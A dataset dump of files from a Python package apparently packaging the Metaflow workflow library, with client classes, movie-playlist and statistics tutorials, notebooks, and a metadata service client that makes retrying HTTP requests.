Returns the datetime object of when the step finished (successfully or not).
A step is considered finished when all the tasks that belong to it have
finished. This call will return None if the step has not finished
Returns
-------
datetime
Datetime of when the step finished
"""
try:
return max(task.finished_at for task in self)
except TypeError:
# Raised if None is present in max
return None
@property
def environment_info(self):
"""
Returns information about the environment that was used to execute this step. As an
example, if the Conda environment is selected, this will return information about the
dependencies that were used in the environment.
This environment information is only available for steps that have tasks
for which the code package has been saved.
Returns
-------
Dict
Dictionary describing the environment
"""
# All tasks have the same environment info so just use the first one
for t in self:
return t.environment_info
class Run(MetaflowObject):
"""
A Run represents an execution of a Flow
As such, it contains all Steps associated with the flow.
Attributes
----------
data : MetaflowData
Container of all data artifacts produced by this run
successful : boolean
True if the run successfully completed
finished : boolean
True if the run completed
finished_at : datetime
Time this run finished
code : MetaflowCode
Code package for this run (if present)
end_task : Task
Task for the end step (if it is present already)
"""
_NAME = 'run'
_CHILD_CLASS = Step
def _iter_filter(self, x):
# exclude _parameters step
return x.id[0] != '_'
def steps(self, *tags):
"""
Returns an iterator over all the steps in the run.
An optional filter is available that allows you to filter on tags. The
steps returned if the filter is specified will contain all the tags
specified.
Parameters
----------
tags : string
Tags to match
Returns
-------
Iterator[Step]
Iterator over Step objects in this run
"""
return self._filtered_children(*tags)
@property
def code(self):
"""
Returns the MetaflowCode object for this run, if present.
Not all runs save their code so this call may return None in those cases.
Returns
-------
MetaflowCode
Code package for this run
"""
if 'start' in self:
return self['start'].task.code
@property
def data(self):
"""
Returns a container of data artifacts producted by this run.
You can access data produced by this run as follows:
```
print(run.data.my_var)
```
This is a shorthand for `run['end'].task.data`. If the 'end' step has not yet
executed, returns None.
Returns
-------
MetaflowData
Container of all artifacts produced by this task
"""
end = self.end_task
if end:
return end.data
@property
def successful(self):
"""
Indicates whether or not the run completed successfully.
A run is successful if its 'end' step is successful.
Returns
-------
bool
True if the run completed successfully and False otherwise
"""
end = self.end_task
if end:
return end.successful
else:
return False
@property
def finished(self):
"""
Indicates whether or not the run completed.
A run completed if its 'end' step completed.
Returns
-------
bool
True if the run completed and False otherwise
"""
end = self.end_task
if end:
return end.finished
else:
return False
@property
def finished_at(self):
"""
Returns the datetime object of when the run finished (successfully or not).
The completion time of a run is the same as the completion time of its 'end' step.
If the 'end' step has not completed, returns None.
Returns
-------
datetime
Datetime of when the run finished
"""
end = self.end_task
if end:
return end.finished_at
@property
def end_task(self):
"""
Returns the Task corresponding to the 'end' step.
This returns None if the end step does not yet exist.
Returns
-------
Task
The 'end' task
"""
try:
end_step = self['end']
except KeyError:
return None
return end_step.task
class Flow(MetaflowObject):
"""
A Flow represents all existing flows with a certain name, in other words,
classes derived from 'FlowSpec'
As such, it contains all Runs (executions of a flow) related to this flow.
Attributes
----------
latest_run : Run
Latest Run (in progress or completed, successfully or not) of this Flow
latest_successful_run : Run
Latest successfully completed Run of this Flow
"""
_NAME = 'flow'
_CHILD_CLASS = Run
def __init__(self, *args, **kwargs):
super(Flow, self).__init__(*args, **kwargs)
@property
def latest_run(self):
"""
Returns the latest run (either in progress or completed) of this flow.
Note that an in-progress run may be returned by this call. Use latest_successful_run
to get an object representing a completed successful run.
Returns
-------
Run
Latest run of this flow
"""
for run in self:
return run
@property
def latest_successful_run(self):
"""
Returns the latest successful run of this flow.
Returns
-------
Run
Latest successful run of this flow
"""
for run in self:
if run.successful:
return run
def runs(self, *tags):
"""
Returns an iterator over all the runs in the flow.
An optional filter is available that allows you to filter on tags. The
runs returned if the filter is specified will contain all the tags
specified.
Parameters
----------
tags : string
Tags to match
Returns
-------
Iterator[Run]
Iterator over Run objects in this flow
"""
return self._filtered_children(*tags) | 6D657461666C6F77 | /6D657461666C6F77-0.0.17.tar.gz/6D657461666C6F77-0.0.17/metaflow/client/core.py | core.py |
# Episode 01-playlist: Let's build you a movie playlist.
--
**This flow loads a movie metadata CSV file and builds a playlist for your
favorite movie genre. Everything in Metaflow is versioned, so you can run it
multiple times and view all the historical playlists with the Metaflow client
in a Notebook**
--
#### Showcasing:
- Including external files with 'IncludeFile'.
- Basic Metaflow Parameters.
- Running workflow branches in parallel and joining results.
- Using the Metaflow client in a Notebook.
#### Before playing this episode:
1. ```python -m pip install notebook```
#### To play this episode:
1. ```cd metaflow-tutorials```
2. ```python 01-playlist/playlist.py show```
3. ```python 01-playlist/playlist.py run```
4. ```python 01-playlist/playlist.py run --genre comedy```
5. ```jupyter-notebook 01-playlist/playlist.ipynb```
| 6D657461666C6F77 | /6D657461666C6F77-0.0.17.tar.gz/6D657461666C6F77-0.0.17/metaflow/tutorials/01-playlist/README.md | README.md |
from metaflow import FlowSpec, step, IncludeFile, Parameter
def script_path(filename):
"""
A convenience function to get the absolute path to a file in this
tutorial's directory. This allows the tutorial to be launched from any
directory.
"""
import os
filepath = os.path.join(os.path.dirname(__file__))
return os.path.join(filepath, filename)
class PlayListFlow(FlowSpec):
"""
A flow to help you build your favorite movie playlist.
The flow performs the following steps:
1) Ingests a CSV file containing metadata about movies.
2) Loads two of the columns from the CSV into python lists.
3) In parallel branches:
- A) Filters movies by the genre parameter.
- B) Choose a random movie from a different genre.
4) Displays the top entries from the playlist.
"""
movie_data = IncludeFile("movie_data",
help="The path to a movie metadata file.",
default=script_path('movies.csv'))
genre = Parameter('genre',
help="Filter movies for a particular genre.",
default='Sci-Fi')
recommendations = Parameter('recommendations',
help="The number of movies to recommend in "
"the playlist.",
default=5)
@step
def start(self):
"""
Parse the CSV file and load the values into a dictionary of lists.
"""
# For this example, we only need the movie title and the genres.
columns = ['movie_title', 'genres']
# Create a simple data frame as a dictionary of lists.
self.dataframe = dict((column, list()) \
for column in columns)
# Parse the CSV header.
lines = self.movie_data.split('\n')
header = lines[0].split(',')
idx = {column: header.index(column) for column in columns}
# Populate our dataframe from the lines of the CSV file.
for line in lines[1:]:
if not line:
continue
fields = line.rsplit(',', 4)
for column in columns:
self.dataframe[column].append(fields[idx[column]])
# Compute genre specific movies and a bonus movie in parallel.
self.next(self.bonus_movie, self.genre_movies)
@step
def bonus_movie(self):
"""
This step chooses a random movie from a different genre.
"""
from random import choice
# Find all the movies that are not in the provided genre.
movies = [(movie, genres) \
for movie, genres \
in zip(self.dataframe['movie_title'],
self.dataframe['genres']) \
if self.genre.lower() not in genres.lower()]
# Choose one randomly.
self.bonus = choice(movies)
self.next(self.join)
@step
def genre_movies(self):
"""
Filter the movies by genre.
"""
from random import shuffle
# Find all the movies titles in the specified genre.
self.movies = [movie \
for movie, genres \
in zip(self.dataframe['movie_title'],
self.dataframe['genres']) \
if self.genre.lower() in genres.lower()]
# Randomize the title names.
shuffle(self.movies)
self.next(self.join)
@step
def join(self, inputs):
"""
Join our parallel branches and merge results.
"""
# Reassign relevant variables from our branches.
self.playlist = inputs.genre_movies.movies
self.bonus = inputs.bonus_movie.bonus
self.next(self.end)
@step
def end(self):
"""
Print out the playlist and bonus movie.
"""
print("Playlist for movies in genre '%s'" % self.genre)
for pick, movie in enumerate(self.playlist, start=1):
print("Pick %d: '%s'" % (pick, movie))
if pick >= self.recommendations:
break
print("Bonus Pick: '%s' from '%s'" % (self.bonus[0], self.bonus[1]))
if __name__ == '__main__':
PlayListFlow() | 6D657461666C6F77 | /6D657461666C6F77-0.0.17.tar.gz/6D657461666C6F77-0.0.17/metaflow/tutorials/01-playlist/playlist.py | playlist.py |
# Episode 05-helloaws: Look Mom, We're in the Cloud
### In HellowAWSFlow, the 'start' and 'end' steps were run locally, while the 'hello' step was run remotely on AWS batch. Since we are using AWS, data artifacts and metdata were stored remotely. This means you can use the client to access information about any flow from anywhere. This notebook shows you how.
## Import the metaflow client
```
from metaflow import Flow, get_metadata
print("Current metadata provider: %s" % get_metadata())
```
## Print the message generated from the flow
```
run = Flow('HelloAWSFlow').latest_successful_run
print("Using run: %s" % str(run))
print(run.data.message)
```
| 6D657461666C6F77 | /6D657461666C6F77-0.0.17.tar.gz/6D657461666C6F77-0.0.17/metaflow/tutorials/05-helloaws/helloaws.ipynb | helloaws.ipynb |
# Episode 05-helloaws: Look Mom, We're in the Cloud.
--
**This flow is a simple linear workflow that verifies your AWS
configuration. The 'start' and 'end' steps will run locally, while the 'hello'
step will run remotely on AWS batch. After configuring Metaflow to run on AWS,
data and metadata about your runs will be stored remotely. This means you can
use the client to access information about any flow from anywhere.**
--
#### Showcasing:
- AWS batch decorator.
- Accessing data artifacts generated remotely in a local notebook.
- retry decorator.
#### Before playing this episode:
1. Configure your sandbox: https://docs.metaflow.org/metaflow-on-aws/metaflow-sandbox
2. ```python -m pip install notebook```
#### To play this episode:
1. ```cd metaflow-tutorials```
2. ```python 05-helloaws/helloaws.py run```
3. ```jupyter-notebook 05-helloaws/helloaws.ipynb```
4. Open 'helloaws.ipynb' in your remote Sagemaker notebook | 6D657461666C6F77 | /6D657461666C6F77-0.0.17.tar.gz/6D657461666C6F77-0.0.17/metaflow/tutorials/05-helloaws/README.md | README.md |
# Episode 04-playlist-plus: The Final Showdown.
--
**Now that we've improved our genre based playlist generator, expose a 'hint'
parameter allowing the user to suggest a better bonus movie. The bonus movie is
chosen from the movie that has the most similiar name to the 'hint'.
This is achieved by importing a string edit distance package using Metaflow's
conda based dependency management feature. Dependency management builds
isolated and reproducible environments for individual steps.**
--
#### Showcasing:
- Metaflow's conda based dependency management.
#### Before playing this episode:
This tutorial requires the 'conda' package manager to be installed with the
conda-forge channel added.
1. Download Miniconda at 'https://docs.conda.io/en/latest/miniconda.html'
2. ```conda config --add channels conda-forge```
#### To play this episode:
1. ```cd metaflow-tutorials```
2. ```python 04-playlist-plus/playlist.py --environment=conda show```
3. ```python 04-playlist-plus/playlist.py --environment=conda run```
4. ```python 04-playlist-plus/playlist.py --environment=conda run --hint "Data Science Strikes Back"``` | 6D657461666C6F77 | /6D657461666C6F77-0.0.17.tar.gz/6D657461666C6F77-0.0.17/metaflow/tutorials/04-playlist-plus/README.md | README.md |
from metaflow import FlowSpec, step, IncludeFile, Parameter, conda, conda_base
def get_python_version():
"""
A convenience function to get the python version used to run this
tutorial. This ensures that the conda environment is created with an
available version of python.
"""
import platform
versions = {'2' : '2.7.15',
'3' : '3.7.3'}
return versions[platform.python_version_tuple()[0]]
# Use the specified version of python for this flow.
@conda_base(python=get_python_version())
class PlayListFlow(FlowSpec):
"""
The next version of our playlist generator that adds a 'hint' parameter to
choose a bonus movie closest to the 'hint'.
The flow performs the following steps:
1) Load the genre specific statistics from the MovieStatsFlow.
2) In parallel branches:
- A) Build a playlist from the top films in the requested genre.
- B) Choose a bonus movie that has the closest string edit distance to
the user supplied hint.
3) Join the two to create a movie playlist and display it.
"""
genre = Parameter('genre',
help="Filter movies for a particular genre.",
default='Sci-Fi')
hint = Parameter('hint',
help="Give a hint to the bonus movie algorithm.",
default='Metaflow Release')
recommendations = Parameter('recommendations',
help="The number of movies recommended for "
"the playlist.",
default=5)
@conda(libraries={'pandas' : '0.24.2'})
@step
def start(self):
"""
Use the Metaflow client to retrieve the latest successful run from our
MovieStatsFlow and assign them as data artifacts in this flow.
This step uses 'conda' to isolate the environment. This step will
always use pandas==0.24.2 regardless of what is installed on the
system.
"""
# Load the analysis from the MovieStatsFlow.
from metaflow import Flow, get_metadata
# Print metadata provider
print("Using metadata provider: %s" % get_metadata())
# Load the analysis from the MovieStatsFlow.
run = Flow('MovieStatsFlow').latest_successful_run
print("Using analysis from '%s'" % str(run))
# Get the dataframe from the start step before we sliced into into
# genre specific dataframes.
self.dataframe = run['start'].task.data.dataframe
# Also grab the summary statistics.
self.genre_stats = run.data.genre_stats
# Compute our two recomendation types in parallel.
self.next(self.bonus_movie, self.genre_movies)
@conda(libraries={'editdistance': '0.5.3', 'pandas' : '0.24.2'})
@step
def bonus_movie(self):
"""
Use the user supplied 'hint' argument to choose a bonus movie that has
the closest string edit distance to the hint.
This step uses 'conda' to isolate the environment. Note that the
package 'editdistance' need not be installed in your python
environment.
"""
import pandas
import editdistance
# Define a helper function to compute the similarity between two
# strings.
def _edit_distance(movie_title):
return editdistance.eval(self.hint, movie_title)
# Compute the distance and take the argmin to find the closest title.
distance = self.dataframe['movie_title'].apply(_edit_distance)
index = distance.idxmin()
self.bonus = (self.dataframe['movie_title'].values[index],
self.dataframe['genres'].values[index])
self.next(self.join)
@conda(libraries={'pandas' : '0.24.2'})
@step
def genre_movies(self):
"""
Select the top performing movies from the use specified genre.
This step uses 'conda' to isolate the environment. This step will
always use pandas==0.24.2 regardless of what is installed on the
system.
"""
import pandas
from random import shuffle
# For the genre of interest, generate a potential playlist using only
# highest gross box office titles (i.e. those in the last quartile).
genre = self.genre.lower()
if genre not in self.genre_stats:
self.movies = []
else:
df = self.genre_stats[genre]['dataframe']
quartiles = self.genre_stats[genre]['quartiles']
selector = df['gross'] >= quartiles[-1]
self.movies = list(df[selector]['movie_title'])
# Shuffle the content.
shuffle(self.movies)
self.next(self.join)
@step
def join(self, inputs):
"""
Join our parallel branches and merge results,
"""
self.playlist = inputs.genre_movies.movies
self.bonus = inputs.bonus_movie.bonus
self.next(self.end)
@step
def end(self):
"""
This step simply prints out the playlist.
"""
# Print the playist.
print("Playlist for movies in genre '%s'" % self.genre)
for pick, movie in enumerate(self.playlist, start=1):
print("Pick %d: '%s'" % (pick, movie))
if pick >= self.recommendations:
break
print("Bonus Pick: '%s' from '%s'" % (self.bonus[0], self.bonus[1]))
if __name__ == '__main__':
PlayListFlow() | 6D657461666C6F77 | /6D657461666C6F77-0.0.17.tar.gz/6D657461666C6F77-0.0.17/metaflow/tutorials/04-playlist-plus/playlist.py | playlist.py |
# Episode 07: Way up here.
### This notebook shows how you can see some basic information about all Metaflow flows that you've run.
## Import the metaflow client
```
from metaflow import Metaflow, Flow, get_metadata
print("Current metadata provider: %s" % get_metadata())
```
## List all flows with their latest completion time and status
```
for flow in Metaflow():
run = flow.latest_run
print("{:<15} Last run: {} Successful: {}".\
format(flow.id, run.finished_at, run.successful))
```
## Give some detailed information on HelloAWSFlow
```
import time
flow = Flow('HelloAWSFlow')
runs = list(flow.runs())
print("HelloAWSFlow:")
for run in runs:
print("Run id: {}, Successful: {}".format(run.id, run.successful))
print("Tags: {}\n".format(sorted(list(run.tags))))
```
| 6D657461666C6F77 | /6D657461666C6F77-0.0.17.tar.gz/6D657461666C6F77-0.0.17/metaflow/tutorials/07-worldview/worldview.ipynb | worldview.ipynb |
# Episode 07-worldview: Way up here.
--
**This episode shows how you can use a notebook to setup a simple dashboard to
monitor all of your Metaflow flows.**
--
#### Showcasing:
- The metaflow client API.
#### Before playing this episode:
1. Configure your sandbox: https://docs.metaflow.org/metaflow-on-aws/metaflow-sandbox
2. ```python -m pip install notebook```
#### To play this episode:
1. ```cd metaflow-tutorials```
2. ```jupyter-notebook 07-worldview/worldview.ipynb```
3. Open 'worldview.ipynb' in your remote Sagemaker notebook | 6D657461666C6F77 | /6D657461666C6F77-0.0.17.tar.gz/6D657461666C6F77-0.0.17/metaflow/tutorials/07-worldview/README.md | README.md |
# Episode 06: Computing in the Cloud.
### In Episode 06 we re-ran MovieStatsFlow on AWS using using remote storage, metadata, and compute. This notebook shows how you can access your artifacts from anywhere.
## Import the metaflow client
```
from metaflow import Flow, get_metadata
import matplotlib.pyplot as plt
print("Current metadata provider: %s" % get_metadata())
```
## Get the latest successful run of MovieStatsFlow
```
run = Flow('MovieStatsFlow').latest_successful_run
print("Using run: %s" % str(run))
```
## You can get all of your data artifacts from the remote datastore, even the 'movies.csv' input file. Lets print the last line of the file.
```
movies_csv = run.data.movie_data
lines = [line for line in movies_csv.split('\n') if line]
print("The best movie ever made:")
print(lines[-1])
```
## Get the genre specific movie statistics
```
genre_stats = run.data.genre_stats
```
## Create a bar plot of the median gross box office for the top-5 grossing genres
```
# Get median for each genre
data = [(genre, data['quartiles'][1]) \
for genre, data \
in genre_stats.items()]
# Sort and unpack into a list of labels, and medians
genre, median = zip(*[(genre, median)\
for genre, median\
in sorted(data, key=lambda pair: pair[1])])
# Create the bar plot
plt.bar(genre[-5:], median[-5:], align='center', alpha=0.5)
plt.ylabel("Gross Box office (US Dollars)")
plt.show()
```
| 6D657461666C6F77 | /6D657461666C6F77-0.0.17.tar.gz/6D657461666C6F77-0.0.17/metaflow/tutorials/06-statistics-redux/stats.ipynb | stats.ipynb |
# Episode 06-statistics-redux: Computing in the Cloud.
--
**This example revisits 'Episode 02-statistics: Is this Data Science?'. With
Metaflow, you don't need to make any code changes to scale-up your flow by
running on remote compute. In this example we re-run the 'stats.py' workflow
adding the '--with batch' command line argument. This instructs Metaflow to run
all your steps on AWS batch without changing any code. You can control the
behavior with additional arguments, like '--max-workers'. For this example,
'max-workers' is used to limit the number of parallel genre specific statistics
computations.
You can then access the data artifacts (even the local CSV file) from anywhere
because the data is being stored in AWS S3.**
--
#### Showcasing:
- '--with batch' command line option
- '--max-workers' command line option
- Accessing data locally or remotely
#### Before playing this episode:
1. Configure your sandbox: https://docs.metaflow.org/metaflow-on-aws/metaflow-sandbox
2. ```python -m pip install pandas```
3. ```python -m pip install notebook```
4. ```python -m pip install matplotlib```
#### To play this episode:
1. ```cd metaflow-tutorials```
2. ```python 02-statistics/stats.py --with batch run --max-workers 4```
3. ```jupyter-notebook 06-statistics-redux/stats.ipynb```
4. Open 'stats.ipynb' in your remote Sagemaker notebook | 6D657461666C6F77 | /6D657461666C6F77-0.0.17.tar.gz/6D657461666C6F77-0.0.17/metaflow/tutorials/06-statistics-redux/README.md | README.md |
from metaflow import FlowSpec, step, IncludeFile
def script_path(filename):
"""
A convenience function to get the absolute path to a file in this
tutorial's directory. This allows the tutorial to be launched from any
directory.
"""
import os
filepath = os.path.join(os.path.dirname(__file__))
return os.path.join(filepath, filename)
class MovieStatsFlow(FlowSpec):
"""
A flow to generate some statistics about the movie genres.
The flow performs the following steps:
1) Ingests a CSV into a Pandas Dataframe.
2) Fan-out over genre using Metaflow foreach.
3) Compute quartiles for each genre.
4) Save a dictionary of genre specific statistics.
"""
movie_data = IncludeFile("movie_data",
help="The path to a movie metadata file.",
default=script_path('movies.csv'))
@step
def start(self):
"""
The start step:
1) Loads the movie metadata into pandas dataframe.
2) Finds all the unique genres.
3) Launches parallel statistics computation for each genre.
"""
import pandas
from io import StringIO
# Load the data set into a pandas dataaframe.
self.dataframe = pandas.read_csv(StringIO(self.movie_data))
# The column 'genres' has a list of genres for each movie. Let's get
# all the unique genres.
self.genres = {genre for genres \
in self.dataframe['genres'] \
for genre in genres.split('|')}
self.genres = list(self.genres)
# We want to compute some statistics for each genre. The 'foreach'
# keyword argument allows us to compute the statistics for each genre in
# parallel (i.e. a fan-out).
self.next(self.compute_statistics, foreach='genres')
@step
def compute_statistics(self):
"""
Compute statistics for a single genre.
"""
# The genre currently being processed is a class property called
# 'input'.
self.genre = self.input
print("Computing statistics for %s" % self.genre)
# Find all the movies that have this genre and build a dataframe with
# just those movies and just the columns of interest.
selector = self.dataframe['genres'].\
apply(lambda row: self.genre in row)
self.dataframe = self.dataframe[selector]
self.dataframe = self.dataframe[['movie_title', 'genres', 'gross']]
# Get some statistics on the gross box office for these titles.
points = [.25, .5, .75]
self.quartiles = self.dataframe['gross'].quantile(points).values
# Join the results from other genres.
self.next(self.join)
@step
def join(self, inputs):
"""
Join our parallel branches and merge results into a dictionary.
"""
# Merge results from the genre specific computations.
self.genre_stats = {inp.genre.lower(): \
{'quartiles': inp.quartiles,
'dataframe': inp.dataframe} \
for inp in inputs}
self.next(self.end)
@step
def end(self):
"""
End the flow.
"""
pass
if __name__ == '__main__':
MovieStatsFlow() | 6D657461666C6F77 | /6D657461666C6F77-0.0.17.tar.gz/6D657461666C6F77-0.0.17/metaflow/tutorials/02-statistics/stats.py | stats.py |
# Episode 02: Is this Data Science?
### MovieStatsFlow loads the movie metadata CSV file into a Pandas Dataframe and computes some movie genre specific statistics. You can use this notebook and the Metaflow client to eyeball the results and make some simple plots.
## Import the metaflow client
```
from metaflow import Flow, get_metadata
import matplotlib.pyplot as plt
print("Current metadata provider: %s" % get_metadata())
```
## Get the movie statistics from the latest run of MovieStatsFlow
```
run = Flow('MovieStatsFlow').latest_successful_run
print("Using run: %s" % str(run))
genre_stats = run.data.genre_stats
```
## Create a bar plot of the median gross box office for the top-5 grossing genres
```
# Get median for each genre
data = [(genre, data['quartiles'][1]) \
for genre, data \
in genre_stats.items()]
# Sort and unpack into a list of labels, and medians
genre, median = zip(*[(genre, median)\
for genre, median\
in sorted(data, key=lambda pair: pair[1])])
# Create the bar plot
plt.bar(genre[-5:], median[-5:], align='center', alpha=0.5)
plt.ylabel("Gross Box office (US Dollars)")
plt.show()
```
| 6D657461666C6F77 | /6D657461666C6F77-0.0.17.tar.gz/6D657461666C6F77-0.0.17/metaflow/tutorials/02-statistics/stats.ipynb | stats.ipynb |
# Episode 02-statistics: Is this Data Science?
--
**Use metaflow to load the movie metadata CSV file into a Pandas Dataframe and
compute some movie genre specific statistics. These statistics are then used in
later examples to improve our playlist generator. You can optionally use the
Metaflow client to eyeball the results in a Notebook, and make some simple
plots using the Matplotlib library.**
--
#### Showcasing:
- Fan-out over a set of parameters using Metaflow foreach.
- Using external packages like Pandas.
- Plotting results in a Notebook.
#### Before playing this episode:
1. ```python -m pip install pandas```
2. ```python -m pip install notebook```
3. ```python -m pip install matplotlib```
#### To play this episode:
1. ```cd metaflow-tutorials```
2. ```python 02-statistics/stats.py show```
3. ```python 02-statistics/stats.py run```
4. ```jupyter-notebook 02-statistics/stats.ipynb```
| 6D657461666C6F77 | /6D657461666C6F77-0.0.17.tar.gz/6D657461666C6F77-0.0.17/metaflow/tutorials/02-statistics/README.md | README.md |
import os
import requests
import time
from metaflow.exception import MetaflowException
from metaflow.metaflow_config import METADATA_SERVICE_NUM_RETRIES, METADATA_SERVICE_HEADERS, \
METADATA_SERVICE_URL
from .metadata import MetadataProvider
class ServiceException(MetaflowException):
headline = 'Metaflow service error'
def __init__(self, msg, http_code=None, body=None):
self.http_code = None if http_code is None else int(http_code)
self.response = body
super(ServiceException, self).__init__(msg)
class ServiceMetadataProvider(MetadataProvider):
TYPE = 'service'
def __init__(self, environment, flow, event_logger, monitor):
super(ServiceMetadataProvider, self).__init__(environment, flow, event_logger, monitor)
@classmethod
def compute_info(cls, val):
v = val.rstrip('/')
try:
resp = requests.get(os.path.join(v, 'ping'), headers=METADATA_SERVICE_HEADERS)
resp.raise_for_status()
except: # noqa E722
raise ValueError('Metaflow service [%s] unreachable.' % v)
return v
@classmethod
def default_info(cls):
return METADATA_SERVICE_URL
def new_run_id(self, tags=[], sys_tags=[]):
return self._new_run(tags=tags, sys_tags=sys_tags)
def register_run_id(self, run_id, tags=[], sys_tags=[]):
pass
def new_task_id(self, run_id, step_name, tags=[], sys_tags=[]):
return self._new_task(run_id, step_name, tags=tags, sys_tags=sys_tags)
def register_task_id(self,
run_id,
step_name,
task_id,
tags=[],
sys_tags=[]):
self._register_code_package_metadata(run_id, step_name, task_id)
def get_runtime_environment(self, runtime_name):
return {}
def register_data_artifacts(self,
run_id,
step_name,
task_id,
attempt_id,
artifacts):
url = ServiceMetadataProvider._obj_path(self._flow_name, run_id, step_name, task_id)
url += '/artifact'
data = self._artifacts_to_json(run_id, step_name, task_id, attempt_id, artifacts)
self._request(self._monitor, url, data)
def register_metadata(self, run_id, step_name, task_id, metadata):
url = ServiceMetadataProvider._obj_path(self._flow_name, run_id, step_name, task_id)
url += '/metadata'
data = self._metadata_to_json(run_id, step_name, task_id, metadata)
self._request(self._monitor, url, data)
@classmethod
def _get_object_internal(cls, obj_type, obj_order, sub_type, sub_order, filters=None, *args):
# Special handling of self, artifact, and metadata
if sub_type == 'self':
url = ServiceMetadataProvider._obj_path(*args[:obj_order])
try:
return MetadataProvider._apply_filter([cls._request(None, url)], filters)[0]
except ServiceException as ex:
if ex.http_code == 404:
return None
raise
# For the other types, we locate all the objects we need to find and return them
if obj_type != 'root':
url = ServiceMetadataProvider._obj_path(*args[:obj_order])
else:
url = ''
if sub_type != 'metadata':
url += '/%ss' % sub_type
else:
url += '/metadata'
try:
return MetadataProvider._apply_filter(cls._request(None, url), filters)
except ServiceException as ex:
if ex.http_code == 404:
return None
raise
def _new_run(self, tags=[], sys_tags=[]):
# first ensure that the flow exists
self._get_or_create('flow')
run = self._get_or_create('run', tags=tags, sys_tags=sys_tags)
return str(run['run_number'])
def _new_task(self,
run_id,
step_name,
tags=[],
sys_tags=[]):
self._get_or_create('step', run_id, step_name)
task = self._get_or_create('task', run_id, step_name, tags=tags, sys_tags=sys_tags)
self._register_code_package_metadata(run_id, step_name, task['task_id'])
return task['task_id']
@staticmethod
def _obj_path(
flow_name, run_id=None, step_name=None, task_id=None, artifact_name=None):
object_path = '/flows/%s' % flow_name
if run_id:
object_path += '/runs/%s' % run_id
if step_name:
object_path += '/steps/%s' % step_name
if task_id:
object_path += '/tasks/%s' % task_id
if artifact_name:
object_path += '/artifacts/%s' % artifact_name
return object_path
@staticmethod
def _create_path(obj_type, flow_name, run_id=None, step_name=None):
create_path = '/flows/%s' % flow_name
if obj_type == 'flow':
return create_path
if obj_type == 'run':
return create_path + '/run'
create_path += '/runs/%s/steps/%s' % (run_id, step_name)
if obj_type == 'step':
return create_path + '/step'
return create_path + '/task'
def _get_or_create(
self, obj_type, run_id=None, step_name=None, task_id=None, tags=[], sys_tags=[]):
def create_object():
data = self._object_to_json(
obj_type,
run_id,
step_name,
task_id,
tags + self.sticky_tags,
sys_tags + self.sticky_sys_tags)
return self._request(self._monitor, create_path, data)
always_create = False
obj_path = self._obj_path(self._flow_name, run_id, step_name, task_id)
create_path = self._create_path(obj_type, self._flow_name, run_id, step_name)
if obj_type == 'run' and run_id is None:
always_create = True
elif obj_type == 'task' and task_id is None:
always_create = True
if always_create:
return create_object()
try:
return self._request(self._monitor, obj_path)
except ServiceException as ex:
if ex.http_code == 404:
return create_object()
else:
raise
@classmethod
def _request(cls, monitor, path, data=None):
if cls.INFO is None:
raise MetaflowException('Missing Metaflow Service URL. '
'Specify with METAFLOW_SERVICE_URL environment variable')
url = os.path.join(cls.INFO, path.lstrip('/'))
for i in range(METADATA_SERVICE_NUM_RETRIES):
try:
if data is None:
if monitor:
with monitor.measure('metaflow.service_metadata.get'):
resp = requests.get(url, headers=METADATA_SERVICE_HEADERS)
else:
resp = requests.get(url, headers=METADATA_SERVICE_HEADERS)
else:
if monitor:
with monitor.measure('metaflow.service_metadata.post'):
resp = requests.post(url, headers=METADATA_SERVICE_HEADERS, json=data)
else:
resp = requests.post(url, headers=METADATA_SERVICE_HEADERS, json=data)
except: # noqa E722
if monitor:
with monitor.count('metaflow.service_metadata.failed_request'):
if i == METADATA_SERVICE_NUM_RETRIES - 1:
raise
else:
if i == METADATA_SERVICE_NUM_RETRIES - 1:
raise
resp = None
else:
if resp.status_code < 300:
return resp.json()
elif resp.status_code != 503:
raise ServiceException('Metadata request (%s) failed (code %s): %s'
% (path, resp.status_code, resp.text),
resp.status_code,
resp.text)
time.sleep(2**i)
if resp:
raise ServiceException('Metadata request (%s) failed (code %s): %s'
% (path, resp.status_code, resp.text),
resp.status_code,
resp.text)
else:
raise ServiceException('Metadata request (%s) failed' % path) | 6D657461666C6F77 | /6D657461666C6F77-0.0.17.tar.gz/6D657461666C6F77-0.0.17/metaflow/metadata/service.py | service.py |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.